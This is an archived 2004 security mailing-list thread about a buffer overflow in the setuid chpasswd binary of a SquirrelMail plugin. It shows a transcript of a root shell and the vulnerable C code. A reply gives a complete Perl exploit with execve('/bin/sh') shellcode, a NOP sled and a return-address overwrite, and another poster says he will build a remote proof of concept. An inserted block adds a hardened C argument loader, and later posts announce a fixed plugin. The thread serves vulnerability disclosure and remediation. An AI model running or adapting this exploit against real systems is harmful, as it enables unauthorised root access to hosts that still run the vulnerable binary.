
View Full Version : Squirrelmail Chpasswod bof



Matias Neiff
17/04/04, 21:45
Hi all

There is a buffer overflow in the chpasswd binary, distributed with the
plugin. This allows a local user to execute commands as root.
---:::Proof:::---
root@orco:/mnt/hosting/hack/bof# su webmaster
webmaster@orco:/mnt/hosting/hack/bof$ ./exploit 166 5555 99999
Using address: 0xbfffe325
bash-2.05b$ ./chpasswd $RET asdf asdf
The new password is equal to old password. Choose another password.
sh-2.05b# id
uid=0(root) gid=3(sys) groups=500(webmaster)
sh-2.05b#
---:::end:::---

Bye all

martin f krafft
19/04/04, 20:25

also sprach Matias Neiff <matias@neiff.com.ar> [2004.04.17.0920 +0200]:
> webmaster@orco:/mnt/hosting/hack/bof$ ./exploit 166 5555 99999

can we please see the code for this exploit?

-- 
martin; (greetings from the heart of the sun.)
\____ echo mailto: !#^."<*>"|tr "<*> mailto:" net@madduck

invalid/expired pgp subkeys? use subkeys.pgp.net as keyserver!

"those who are faithful know only the trivial side of love:
it is the faithless who know love's tragedies."
-- oscar wilde


20/04/04, 01:45
In-Reply-To: <20040417193848.GA31925@piper.madduck.net>

Hi
>> webmaster@orco:/mnt/hosting/hack/bof$ ./exploit 166 5555 99999
>
>can we please see the code for this exploit?

Certainly, but I admire your courage to ask for such a simple one though :]
Let's take a quick peek at chpasswd.c:
<---snip--->
#define STR_MAX 100
#define MAXLEN 1024

/* in main, static, my favourite */
char User[STR_MAX];
char buf[MAXLEN];
char PUser[50];
char New_pw[50];
char Old_pw[50];

/* now let's up our privilege without really needing it yet */
if((setuid(0)) < 0) eperror("setuid");
if((setgid(3)) < 0) eperror("setgid");

/* now let's hand over control to someone, heh */
sprintf(User,"%s",argv[1]); /* heh */
sprintf(Old_pw,"%s",argv[2]); /* heh */
sprintf(New_pw,"%s",argv[3]); /* heh */

/* some humor */
if(!strcmp(User,"root")){
printf("The %s user cannot be edited for security reasons.\n",User);
return 4; //the root user cannot be edited for security reasons
}

/* .. snip .. */
strcpy(PUser,User); /* heh! PUser is 50 bytes, User is STR_MAX (100) */

/* we all see the problems here, no? */
<---snip--->
Some lame 5-minute code; it should exploit the same thing Matias did:

<---begin--->
#!/usr/bin/perl -w
# i guess this ain't of much use unless you have a web-account
# or something on the host, heh. this should be pretty selfexplanatory
# - rip
use strict;

my $ret = 0xbffff732; # ret, worked for me, prolly won't for you. change it.
my $length = 190; # buffer length for smashing without ruining it (not used below)
my $eipdist = 144; # distance to overwrite eip
my $offset = 0; # offset
my $numnops = 10; # number of nops?
my $nop = "\x90"; # nop
my $pw = 'heh'; # random string, heh, 3 chars for current $ret

# dunno where this came from, it was just lying there.
# (Linux/x86 execve("//bin/sh"), 24 bytes, no NUL bytes)
my $shellcode = "\x31\xd2\x52\x68\x6e\x2f\x73\x68".
"\x68\x2f\x2f\x62\x69\x89\xe3\x52".
"\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

sub generate_string {
    my ($r, $o, $len) = @_;
    my $buffer = '';

    # return address as a 32-bit little-endian word; 'V' is the unsigned
    # form of the 'l' the original used and yields the same bytes on x86
    my $new_ret = pack('V', $r + $o);

    # pad argv[1] with copies of the return address up to the saved eip
    for (my $i = 0; $i < $eipdist; $i += 4) { $buffer .= $new_ret; }
    # nop sled followed by the shellcode; $ret must land inside the sled
    $buffer .= $nop x $numnops;
    $buffer .= $shellcode;

    return $buffer;
}

$offset = $ARGV[0] if defined $ARGV[0];

print "[heh] moron.pl | rip\@overflow.no\n";
print "[heh] Address: 0x", sprintf('%lx', $ret), "\n[heh] Offset $offset\n";

my $evil = generate_string($ret, $offset, $length);
# argv[1] is the overflowing username, argv[2]/argv[3] the passwords
# (the original also passed a stray trailing 0, which became a fifth argument)
exec('./chpasswd', $evil, $pw, $pw) or die "exec: $!";
<---end--->

- rip
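
An added example, written for this page and not taken from the thread or from the chpasswd plugin: the argv-to-fixed-buffer pattern that Matias reported and rip dissected above, placed beside a bounded replacement that validates every argument before anything privileged would run. The buffer sizes follow the quoted snippet; the function names, error codes and sample inputs are my own assumptions.

```c
/* Added example, not code from the thread or from the chpasswd plugin.
 * Buffer sizes follow the quoted chpasswd.c; function names, error codes
 * and the constructed sample inputs are assumptions. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define STR_MAX 100
#define PW_MAX  50

/* The binary later does strcpy(PUser, User) with PUser[50], so a username
 * that fits User[100] still overflows downstream. The checked loader bounds
 * the username by the smallest buffer it ever lands in. */
#define USER_MAX PW_MAX

enum chpw_err {
    CHPW_OK = 0,
    CHPW_ERR_USER_LEN,
    CHPW_ERR_OLD_LEN,
    CHPW_ERR_NEW_LEN,
    CHPW_ERR_ROOT,
    CHPW_ERR_SAME_PW
};

struct creds {
    char user[STR_MAX];
    char old_pw[PW_MAX];
    char new_pw[PW_MAX];
};

/* Vulnerable shape (same as the quoted chpasswd.c): sprintf("%s") copies up
 * to the NUL in argv regardless of the destination size. Only call it with
 * inputs known to fit; on longer input it writes past the buffers. */
void load_creds_unchecked(struct creds *c, const char *u, const char *o, const char *n)
{
    sprintf(c->user, "%s", u);
    sprintf(c->old_pw, "%s", o);
    sprintf(c->new_pw, "%s", n);
}

/* Copy src into dst[dstsz] only if it fits including the NUL. Rejecting,
 * rather than truncating with strncpy/snprintf, matters here: a silently
 * truncated password would be set to something the user never typed. */
static int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t len = strnlen(src, dstsz);
    if (len >= dstsz)
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Hardened loader: length checks first, policy checks second. Nothing here
 * touches setuid/setgid; a caller should raise privileges only after this
 * returns CHPW_OK, not before parsing argv as the original binary does. */
int load_creds_checked(struct creds *c, const char *u, const char *o, const char *n)
{
    if (copy_bounded(c->user, USER_MAX, u) != 0)
        return CHPW_ERR_USER_LEN;
    if (copy_bounded(c->old_pw, sizeof c->old_pw, o) != 0)
        return CHPW_ERR_OLD_LEN;
    if (copy_bounded(c->new_pw, sizeof c->new_pw, n) != 0)
        return CHPW_ERR_NEW_LEN;
    if (strcmp(c->user, "root") == 0)
        return CHPW_ERR_ROOT;
    if (strcmp(c->old_pw, c->new_pw) == 0)
        return CHPW_ERR_SAME_PW;
    return CHPW_OK;
}

/* Wrapper so the outcome is a plain return value. */
int check_args(const char *u, const char *o, const char *n)
{
    struct creds c;
    return load_creds_checked(&c, u, o, n);
}

/* Constructed sample input: len bytes of 'A', like the 190-byte argv[1]
 * rip's script builds. Returns a static buffer, so use one call per argument. */
const char *constructed_arg(size_t len)
{
    static char buf[256];
    if (len > sizeof buf - 1)
        len = sizeof buf - 1;
    memset(buf, 'A', len);
    buf[len] = '\0';
    return buf;
}

int main(void)
{
    struct creds c;
    int rc = check_args(constructed_arg(190), "asdf", "asdf");
    printf("190-byte username -> rc=%d (%s)\n", rc, rc == CHPW_OK ? "accepted" : "rejected");
    load_creds_unchecked(&c, "webmaster", "old", "new"); /* short args, so safe */
    printf("unchecked copy of short args: user=%s\n", c.user);
    return 0;
}
```

The length bound on the username is 50 rather than STR_MAX because the quoted code later copies User into PUser[50]; bounding each field by the largest buffer it is first written to, instead of the smallest it ever reaches, would leave that second overflow in place.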

Peter Geissler
20/04/04, 03:25
In-Reply-To: <200404170420.32857.matias@neiff.com.ar>

Hi,

Did you drink too much when writing this `advisory'? No seriously, you even made a typo in the title of your thread!
Did you inform the people at Squirrelmail about this? I located the exact vuln in chpasswd.c:
----
char User[STR_MAX];
char New_pw[50];
char Old_pw[50];

..

sprintf(User,"%s",argv[1]);
sprintf(Old_pw,"%s",argv[2]);
sprintf(New_pw,"%s",argv[3]);
---

STR_MAX has a value of 100. So as you probably already have seen, there occurs a stack-based overflow when user, old_pw or new_pw is filled with too many bytes (which come from argv[], the command line). In your `exploitation example' you used local rights to exploit this. However, I think it's also possible to exploit without shell access, using the squirrelmail web interface itself. I'm at work right now, but when I'm home I'll be looking into creating a PoC exploit for this one.

Best regards,
Peter "blasty" Geissler

P.S. The version of the chpasswd plugin found on the squirrelmail/SF page is still vulnerable to this bug, so I doubt you informed the people at squirrelmail.


Jonathan Angliss
20/04/04, 06:35
Hello Matias,
On Saturday, April 17, 2004, Matias Neiff wrote...

> There is a boffer over flow in the chpasswd binary, distributed with the
> plugin. This allow to local's user to execute commands as a root.

It should be noted that while this is a plugin for SquirrelMail, it is
not distributed as part of the SquirrelMail installation, and
generally not supported by the SquirrelMail development team. However,
due to the issue, we are looking into correcting this problem.

--
Jonathan Angliss
(jon@squirrelmail.org)

p dont think
28/04/04, 04:15
All,

Replying to this thread using the web interface didn't seem to work
at all, so... Please excuse me effectively starting the thread over,
but wanted to make sure a follow-up got posted to the list. See:

http://www.securityfocus.com/archive/1/360547/2004-04-14/2004-04-20/2

> Hi all
>
> There is a boffer over flow in the chpasswd binary, distributed with
> the plugin. This allow to local's user to execute commands as a root.

This problem (and several others that were really needing to be
fixed) has been resolved and a new version of this plugin is available
at the link below. Obviously, it is highly recommended that anyone
using this plugin upgrade immediately.

http://www.squirrelmail.org/plugin_view.php?id=117

Matias, next time please contact the plugin authors, any of the
SquirrelMail mailing lists, SquirrelMail IRC, or other SquirrelMail
developers before posting.

Thanks,

Paul

